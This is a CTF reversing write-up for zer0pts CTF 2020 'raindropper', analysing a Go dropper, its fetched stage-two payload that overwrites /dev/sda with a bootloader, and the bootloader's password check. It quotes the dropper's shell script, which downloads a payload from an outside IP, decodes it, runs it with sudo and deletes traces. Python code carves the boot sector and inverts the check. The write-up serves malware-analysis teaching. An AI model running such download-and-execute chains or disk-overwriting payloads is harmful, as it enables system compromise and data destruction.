
[zer0pts CTF 2020] raindropper

tags: zer0pts CTF reversing

Overview

We're given a 32-bit ELF.
The binary is written in Go and fully stripped, so static analysis is painful. Let's run it on a VM instead.


Nothing happens.
*When analysing real malware, disconnect the VM from the network before running anything!

Analysing "malware"

strace shows the binary creating a socket. You can either capture the traffic or search the binary for an IP address.

$ strings malware | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
...bodyhttp://13.230.161.88:8033/raindropillegal...

http://13.230.161.88:8033/raindrop is suspicious.

Fetching that URL returns the following shell script.

#!/bin/bash
# Only proceed on a machine whose current user is literally "ImSureItsOnVM"
if [ "$(whoami)" != "ImSureItsOnVM" ]; then
    echo "****** zer0pts CTF 2020 ******"
    echo "*                            *"
    echo "*   You're not our target!   *"
    echo "*                            *"
    echo "******************************"
else
    # Stage 2: fetch the base64-encoded "malchan", decode it, run it as root, then clean up
    wget -nv -O /tmp/.malchan http://13.230.161.88:8033/malchan 1> /dev/null 2> /dev/null
    cat /tmp/.malchan | base64 -d > /tmp/.malchan.bin 2> /dev/null
    chmod +x /tmp/.malchan.bin 2> /dev/null
    sudo /tmp/.malchan.bin 2> /dev/null
    rm -f /tmp/.malchan.bin 2> /dev/null
    rm -f /tmp/.malchan 2> /dev/null
    rm -f /tmp/.raindrop 2> /dev/null
fi

Let's download malchan too.

Analysing "malchan"

malchan is a tiny binary, small enough to understand by static analysis alone.
It does one thing: when run as root, it writes a bootloader to /dev/sda (which is why the dropper script runs it with sudo). The bootloader blob can be extracted from the binary with a short Python script or similar.
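One way to carve the blob out, as an added example rather than the write-up's own script: it assumes malchan stores the bootloader as a plain 512-byte boot sector ending in the 0x55AA boot signature (if the real binary encodes the blob, decode it first and run this over the result). The input file below is constructed for the demonstration.

```python
# Added example (not the write-up's script): carve a raw boot sector out of a
# file. Assumption: the bootloader is embedded as an unencoded 512-byte
# sector whose last two bytes are the 0x55AA boot signature.
import sys

SECTOR = 512
BOOT_SIG = b"\x55\xaa"


def find_boot_sectors(data: bytes) -> list:
    """Offsets of every 512-byte window whose last two bytes are 0x55AA."""
    hits = []
    pos = data.find(BOOT_SIG)
    while pos != -1:
        start = pos - (SECTOR - 2)
        if start >= 0:
            hits.append(start)
        pos = data.find(BOOT_SIG, pos + 1)
    return hits


def looks_like_code(sector: bytes) -> bool:
    """Cheap plausibility filter: x86 boot sectors essentially never start
    with a zero byte, and a window that is mostly zeros is padding that
    happens to end in 55 AA, not code."""
    return sector[0] != 0 and sector.count(0) < SECTOR // 2


def carve(data: bytes) -> list:
    """Return (offset, sector) pairs that pass the signature and code filters."""
    out = []
    for off in find_boot_sectors(data):
        sector = data[off:off + SECTOR]
        if looks_like_code(sector):
            out.append((off, sector))
    return out


# Constructed test input: an ELF-looking header, padding, then a fake sector
# whose body is a few x86 bytes (cli; xor ax,ax; jmp $) padded with NOPs and
# closed with the boot signature.
FAKE_SECTOR = b"\xfa\x31\xc0\xeb\xfe" + b"\x90" * (SECTOR - 7) + BOOT_SIG
SAMPLE_FILE = b"\x7fELF" + b"\x00" * 100 + FAKE_SECTOR + b"\x00" * 64

if __name__ == "__main__":
    # Usage: python carve_mbr.py /tmp/.malchan.bin  (falls back to the sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_FILE
    for off, sector in carve(data):
        name = "boot_%x.bin" % off
        with open(name, "wb") as f:
            f.write(sector)
        print("sector at 0x%x -> %s, head: %s" % (off, name, sector[:8].hex()))
```

Each carved file can then be disassembled as 16-bit real-mode code (for example with `ndisasm -b16`, or `objdump -D -b binary -m i8086`) or booted directly in an emulator.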

Analysing bootloader

The bootloader prompts for a password and checks it with the routine below.

check:
        xor dx, dx              ; dl = previous output byte, starts at 0
        xor cx, cx
        mov si, password        ; user input
        mov di, spaghetti       ; expected (encoded) bytes
        mov cl, 0x29            ; 41 characters to check
        .@Loop:
        lodsb                   ; al = next input byte
        add al, dl              ; add the previous output byte
        ror al, 1               ; rotate right by one
        mov dl, al              ; remember this output for the next round
        scasb                   ; compare al with spaghetti[di], di++
        jnz .@Error
        loop .@Loop
        lodsb                   ; 42nd byte (the terminator) is compared untransformed
        scasb
        jnz .@Error
        xor ax, ax              ; ax = 0 -> correct
        ret
        .@Error:
        xor ax, ax
        inc al                  ; ax = 1 -> wrong
        ret

Each input byte has the previous output byte (dl) added to it and is then rotated right by one before being compared against the `spaghetti` table, so the transform is trivially invertible: rotate each stored byte left by one and subtract the stored byte before it. Decoding the 41-byte table gives the flag.
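A Python model of the routine and its inverse, added here as an example rather than taken from the write-up. The real `spaghetti` bytes are not reproduced on this page, so SAMPLE_FLAG is a constructed 41-byte stand-in and SAMPLE_TABLE is derived from it; to recover the real flag, feed the carved table to `decode()`.

```python
# Added example (not from the original write-up): emulate the bootloader's
# `check` routine, and invert it. SAMPLE_FLAG / SAMPLE_TABLE are constructed
# stand-ins for the real password and `spaghetti` table.

PASSWORD_LEN = 0x29  # mov cl, 0x29 -> the loop compares 41 transformed bytes


def ror8(x: int) -> int:
    """ror al, 1 on an 8-bit value."""
    x &= 0xFF
    return ((x >> 1) | (x << 7)) & 0xFF


def rol8(x: int) -> int:
    """Inverse of ror8 (rol al, 1)."""
    x &= 0xFF
    return ((x << 1) | (x >> 7)) & 0xFF


def encode(plain: bytes) -> bytes:
    """Loop body: al = ror(al + dl, 1); dl = al.
    dl starts at 0 (xor dx, dx) and always holds the previous *output* byte."""
    out = bytearray()
    prev = 0
    for b in plain:
        c = ror8(b + prev)
        out.append(c)
        prev = c
    return bytes(out)


def decode(table: bytes) -> bytes:
    """Invert encode(): plain[i] = rol(table[i], 1) - table[i-1]."""
    out = bytearray()
    prev = 0
    for c in table:
        out.append((rol8(c) - prev) & 0xFF)
        prev = c
    return bytes(out)


def check(user_input: bytes, table: bytes) -> int:
    """Emulate `check`: 0 (ax = 0) on success, 1 on the .@Error path.
    The input is modelled as a NUL-terminated buffer; the final lodsb/scasb
    compares the untransformed byte after the 41st character, which pins the
    length to exactly 41 when the table ends in a NUL."""
    buf = user_input + b"\x00"
    prev = 0
    for i in range(PASSWORD_LEN + 1):
        if i >= len(buf) or i >= len(table):
            return 1  # the real code would read past the buffer; treat as mismatch
        b = buf[i]
        if i < PASSWORD_LEN:
            b = ror8(b + prev)  # add dl; ror al, 1
            prev = b            # mov dl, al
        if b != table[i]:       # scasb / jnz .@Error
            return 1
    return 0


# Constructed stand-in for the flag (41 bytes, as the loop count demands).
SAMPLE_FLAG = b"zer0pts{this_is_constructed_sample_flag!}"
# What `spaghetti` would hold for it: 41 encoded bytes plus the NUL that the
# final scasb compares.
SAMPLE_TABLE = encode(SAMPLE_FLAG) + b"\x00"

if __name__ == "__main__":
    print("table :", SAMPLE_TABLE.hex())
    print("decode:", decode(SAMPLE_TABLE[:PASSWORD_LEN]))
    print("check :", check(SAMPLE_FLAG, SAMPLE_TABLE), check(b"wrong", SAMPLE_TABLE))
```

Because the chaining uses the previous ciphertext byte rather than the previous plaintext byte, decoding needs no recursion: every plaintext byte depends only on two adjacent table bytes.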